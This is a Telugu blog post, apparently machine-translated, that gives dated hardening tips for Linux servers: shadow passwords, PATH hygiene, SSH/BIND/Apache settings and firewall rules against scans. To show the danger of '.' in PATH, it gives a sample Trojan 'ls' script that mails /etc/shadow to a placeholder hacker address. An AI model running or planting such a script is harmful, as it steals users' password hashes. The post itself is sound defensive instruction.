మీ లైనక్స్ (సర్వర్) కోసం భద్రతా చిట్కాలు (పార్ట్ 1)

నేను చాలా కాలంగా బ్లాగులో ఏమీ ప్రచురించలేదు మరియు ఒక పుస్తకం నుండి కొన్ని చిట్కాలను పంచుకోవాలనుకుంటున్నాను, (ఇతరులలో). నేను దానిని విశ్వవిద్యాలయంలో కనుగొన్నాను మరియు నేను చదివాను మరియు ఇది నిజాయితీగా కొంచెం పాతది అయినప్పటికీ మరియు చూపిన పద్ధతులు వ్యవస్థ యొక్క పరిణామానికి అనుగుణంగా పనిచేయడానికి చాలా అవకాశం లేనప్పటికీ, అవి కూడా చూపించగల ఆసక్తికరమైన అంశాలు. 9788448140502

డెస్క్‌టాప్ వినియోగదారు స్థాయిలో, అవి వర్తింపజేయగలిగినప్పటికీ, అవి చాలా ఉపయోగకరంగా ఉండవు కాబట్టి, అవి మీడియం లేదా బహుశా పెద్ద ఎత్తున సర్వర్‌గా ఉపయోగించబడే లైనక్స్ సిస్టమ్‌కు సంబంధించిన సలహా అని నేను స్పష్టం చేయాలనుకుంటున్నాను.

అవి సరళమైన శీఘ్ర చిట్కాలు అని కూడా నేను గమనించాను మరియు నేను చాలా వివరంగా చెప్పను, అయినప్పటికీ ఒక నిర్దిష్ట అంశంపై ఇంకొక ప్రత్యేకమైన మరియు విస్తృతమైన పోస్ట్ చేయాలనుకుంటున్నాను. కానీ నేను తరువాత చూస్తాను. ప్రారంభిద్దాం.

పాస్‌వర్డ్ విధానాలు. 

ఇది క్యాచ్‌ఫ్రేజ్ లాగా అనిపించినప్పటికీ, మంచి పాస్‌వర్డ్ విధానాన్ని కలిగి ఉండటం వలన హాని కలిగించే సిస్టమ్ మధ్య వ్యత్యాసం ఉంటుంది. "బ్రూట్ ఫోర్స్" వంటి దాడులు సిస్టమ్‌ను యాక్సెస్ చేయడానికి చెడ్డ పాస్‌వర్డ్ కలిగి ఉండటం వల్ల ప్రయోజనం పొందుతాయి. అత్యంత సాధారణ చిట్కాలు:

  • పెద్ద, చిన్న అక్షరాలను కలపండి.
  • ప్రత్యేక అక్షరాలను ఉపయోగించండి.
  • సంఖ్యలు.
  • 6 అంకెలు కంటే ఎక్కువ (ఆశాజనక 8 కన్నా ఎక్కువ).

దీనికి తోడు, రెండు ముఖ్యమైన ఫైళ్ళను పరిశీలిద్దాం.  / etc / passwd మరియు / etc / shadow.

చాలా ముఖ్యమైన విషయం ఏమిటంటే ఫైల్ / etc / passwd. మాకు యూజర్ పేరు ఇవ్వడంతో పాటు, అతని యుఐడి, ఫోల్డర్ పాత్, బాష్ .. మొదలైనవి. కొన్ని సందర్భాల్లో ఇది యూజర్ యొక్క గుప్తీకరించిన కీని కూడా చూపిస్తుంది.

 దాని విలక్షణమైన కూర్పును చూద్దాం.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

వినియోగదారు: క్రిప్ట్‌కీ: uid: gid: path :: path: bash

ఇక్కడ అసలు సమస్య ఏమిటంటే, ఈ ప్రత్యేక ఫైల్‌కు అనుమతులు ఉన్నాయి -rw-r - r– అంటే సిస్టమ్‌లోని ఏ యూజర్‌కైనా ఇది చదవడానికి అనుమతులను కలిగి ఉంటుంది. మరియు గుప్తీకరించిన కీని కలిగి ఉండటం నిజమైనదాన్ని అర్థంచేసుకోవడం చాలా కష్టం కాదు.

అందుకే ఫైల్ ఉంది / etc / shadow. అన్ని ఇతర వినియోగదారు కీలు నిల్వ చేయబడిన ఫైల్ ఇది. ఈ ఫైల్‌కు అవసరమైన అనుమతులు ఉన్నాయి, తద్వారా ఏ యూజర్ అయినా చదవలేరు.

దీన్ని పరిష్కరించడానికి, మేము ఫైల్‌కు వెళ్ళాలి / Etc / passwd మరియు గుప్తీకరించిన కీని "x" గా మార్చండి, ఇది మా ఫైల్‌లోని కీని మాత్రమే సేవ్ చేస్తుంది / etc / shadow.

desdelinux:x:500:501::/home/usuario1:/bin/bash

PATH మరియు .bashrc మరియు ఇతరులతో సమస్యలు.

ఒక వినియోగదారు వారి కన్సోల్‌లో ఒక ఆదేశాన్ని అమలు చేసినప్పుడు, షెల్ ఆ ఆదేశాన్ని PATH ఎన్విరాన్మెంట్ వేరియబుల్‌లో ఉన్న డైరెక్టరీ జాబితాలో చూస్తుంది.

మీరు కన్సోల్‌లో "echo $ PATH" అని టైప్ చేస్తే అది ఇలాంటిదే అవుట్‌పుట్ చేస్తుంది.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

ఈ ఫోల్డర్లలో ప్రతి ఒక్కటి షెల్ దానిని అమలు చేయడానికి వ్రాసిన ఆదేశాన్ని చూస్తుంది. అతను "." అంటే శోధించిన మొదటి ఫోల్డర్ కమాండ్ ఎగ్జిక్యూట్ అయిన చోట నుండి అదే ఫోల్డర్.

"కార్లోస్" అనే వినియోగదారు ఉన్నాడు మరియు ఈ వినియోగదారు "చెడు చేయాలనుకుంటున్నాడు" అనుకుందాం. ఈ వినియోగదారు తన ప్రధాన ఫోల్డర్‌లో "ls" అనే ఫైల్‌ను వదిలివేయవచ్చు మరియు ఈ ఫైల్‌లో ఇలాంటి ఆదేశాన్ని అమలు చేయండి:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

గమ్యం యొక్క విషయాల కోసం రూట్ యూజర్ ఉంటే, కార్లోస్ ఫోల్డర్‌లోని ఫోల్డర్‌లను జాబితా చేయడానికి ప్రయత్నిస్తుంది (ఇది మొదట అదే ఫోల్డర్‌లో కమాండ్ కోసం చూస్తున్నట్లుగా, అనుకోకుండా అది పాస్‌వర్డ్‌లతో ఫైల్‌ను ఈ ఇమెయిల్‌కు పంపుతుంది మరియు తరువాత ఫోల్డర్‌లు జాబితా చేయబడతాయి మరియు అతను చాలా ఆలస్యం వరకు కనుగొనలేదు.

దానిని నివారించడానికి మనం "." PATH వేరియబుల్ యొక్క.

అదే విధంగా, /.bashrc, /.bashrc_profile, ./.login వంటి ఫైళ్ళను ఆడిట్ చేయాలి మరియు "" "లేదని తనిఖీ చేయాలి. PATH వేరియబుల్‌లో, మరియు వాస్తవానికి ఇలాంటి ఫైళ్ళ నుండి, మీరు ఒక నిర్దిష్ట ఆదేశం యొక్క గమ్యాన్ని మార్చవచ్చు.

సేవలతో చిట్కాలు:

SHH

  • Sshd_config ఫైల్‌లోని ssh ప్రోటోకాల్ యొక్క వెర్షన్ 1 ని నిలిపివేయండి.
  • Ssh ద్వారా రూట్ యూజర్ లాగిన్ అవ్వడానికి అనుమతించవద్దు.
  • ఫైల్‌లు మరియు ఫోల్డర్‌లు ssh_host_key, ssh_host_dsa_key మరియు ssh_host_rsa_key రూట్ యూజర్ మాత్రమే చదవాలి.

BIND

  • సంస్కరణ సంఖ్యను చూపించకుండా ఉండటానికి పేరు పెట్టబడిన ఫైల్‌లో స్వాగత సందేశాన్ని మార్చండి
  • జోన్ బదిలీలను పరిమితం చేయండి మరియు అవసరమైన జట్లకు మాత్రమే దీన్ని ప్రారంభించండి.

Apache

  • స్వాగత సందేశంలో మీ సంస్కరణను ప్రదర్శించకుండా సేవను నిరోధించండి. Httpd.conf ఫైల్‌ను సవరించండి మరియు పంక్తులను జోడించండి లేదా సవరించండి:  

ServerSignature Off
ServerTokens Prod

  • ఆటోమేటిక్ ఇండెక్సింగ్‌ను నిలిపివేయండి
  • .Htacces, * .inc, * .jsp .. etc వంటి సున్నితమైన ఫైళ్ళను అందించవద్దని అపాచీని కాన్ఫిగర్ చేయండి
  • సేవ నుండి మ్యాన్ పేజీలను లేదా నమూనాను తొలగించండి
  • క్రూటెడ్ వాతావరణంలో అపాచీని అమలు చేయండి

నెట్‌వర్క్ భద్రత.

బాహ్య నెట్‌వర్క్ నుండి మీ సిస్టమ్‌కు సాధ్యమయ్యే అన్ని ఎంట్రీలను కవర్ చేయడం చాలా అవసరం, చొరబాటుదారులను మీ నెట్‌వర్క్ నుండి స్కాన్ చేయకుండా మరియు సమాచారాన్ని పొందకుండా నిరోధించడానికి ఇక్కడ కొన్ని ముఖ్యమైన చిట్కాలు ఉన్నాయి.

ICMP ట్రాఫిక్‌ను నిరోధించండి

అన్ని రకాల ఇన్‌కమింగ్ మరియు అవుట్గోయింగ్ ICMP ట్రాఫిక్ మరియు ప్రతిధ్వని ప్రతిస్పందనలను నిరోధించడానికి ఫైర్‌వాల్ కాన్ఫిగర్ చేయాలి. దీనితో మీరు దీన్ని నివారించండి, ఉదాహరణకు, IP పరిధిలో ప్రత్యక్ష పరికరాల కోసం వెతుకుతున్న స్కానర్ మిమ్మల్ని కనుగొంటుంది. 

టిసిపి పింగ్ స్కాన్ మానుకోండి.

మీ సిస్టమ్‌ను స్కాన్ చేయడానికి ఒక మార్గం TCP పింగ్ స్కాన్. మీ సర్వర్‌లో పోర్ట్ 80 లో అపాచీ సర్వర్ ఉందని అనుకుందాం. చొరబాటుదారుడు ఆ పోర్ట్‌కు ACK అభ్యర్థనను పంపగలడు, దీనితో, సిస్టమ్ ప్రతిస్పందిస్తే, కంప్యూటర్ సజీవంగా ఉంటుంది మరియు మిగిలిన పోర్ట్‌లను స్కాన్ చేస్తుంది.

దీని కోసం, మీ ఫైర్‌వాల్ ఎల్లప్పుడూ "స్టేట్ అవేర్‌నెస్" ఎంపికను కలిగి ఉండాలి మరియు ఇప్పటికే స్థాపించబడిన TCP కనెక్షన్ లేదా సెషన్‌కు అనుగుణంగా లేని అన్ని ACK ప్యాకెట్లను విస్మరించాలి.

కొన్ని అదనపు చిట్కాలు:

  • మీ నెట్‌వర్క్‌కు పోర్ట్ స్కాన్‌లను గుర్తించడానికి IDS వ్యవస్థలను ఉపయోగించండి.
  • కనెక్షన్ సోర్స్ పోర్ట్ సెట్టింగులను విశ్వసించని విధంగా ఫైర్‌వాల్‌ను కాన్ఫిగర్ చేయండి.

ఎందుకంటే కొన్ని స్కాన్లు 20 లేదా 53 వంటి "నకిలీ" సోర్స్ పోర్టును ఉపయోగిస్తాయి, ఎందుకంటే చాలా వ్యవస్థలు ఈ పోర్టులను విశ్వసిస్తాయి ఎందుకంటే అవి ఒక ftp లేదా DNS కి విలక్షణమైనవి.

గమనిక: ఈ పోస్ట్‌లో సూచించిన చాలా సమస్యలు ఇప్పటికే అన్ని ప్రస్తుత పంపిణీలలో పరిష్కరించబడ్డాయి అని గుర్తుంచుకోండి. కానీ ఈ సమస్యల గురించి మీకు ముఖ్యమైన సమాచారం ఉండడం వల్ల అవి మీకు జరగవు.

గమనిక: తరువాత నేను ఒక నిర్దిష్ట అంశాన్ని చూస్తాను మరియు మరింత వివరంగా మరియు ప్రస్తుత సమాచారంతో ఒక పోస్ట్ చేస్తాను.

అందరికీ చదివినందుకు ధన్యవాదాలు.

శుభాకాంక్షలు.


వ్యాసం యొక్క కంటెంట్ మా సూత్రాలకు కట్టుబడి ఉంటుంది సంపాదకీయ నీతి. లోపం నివేదించడానికి క్లిక్ చేయండి ఇక్కడ.

ఒక వ్యాఖ్య, మీదే

మీ వ్యాఖ్యను ఇవ్వండి

మీ ఇమెయిల్ చిరునామా ప్రచురితమైన కాదు. లు గుర్తించబడతాయి గుర్తించబడతాయి *

*

*

  1. డేటాకు బాధ్యత: మిగ్యుల్ ఏంజెల్ గాటన్
  2. డేటా యొక్క ఉద్దేశ్యం: కంట్రోల్ స్పామ్, వ్యాఖ్య నిర్వహణ.
  3. చట్టబద్ధత: మీ సమ్మతి
  4. డేటా యొక్క కమ్యూనికేషన్: డేటా చట్టపరమైన బాధ్యత ద్వారా తప్ప మూడవ పార్టీలకు తెలియజేయబడదు.
  5. డేటా నిల్వ: ఆక్సెంటస్ నెట్‌వర్క్స్ (EU) హోస్ట్ చేసిన డేటాబేస్
  6. హక్కులు: ఎప్పుడైనా మీరు మీ సమాచారాన్ని పరిమితం చేయవచ్చు, తిరిగి పొందవచ్చు మరియు తొలగించవచ్చు.

  1.   కంప్యూటర్ అతను చెప్పాడు

    నేను వ్యాసాన్ని నిజంగా ఇష్టపడ్డాను మరియు ఈ విషయంపై నాకు ఆసక్తి ఉంది, కంటెంట్‌ను అప్‌లోడ్ చేయడాన్ని కొనసాగించమని నేను మిమ్మల్ని ప్రోత్సహిస్తున్నాను.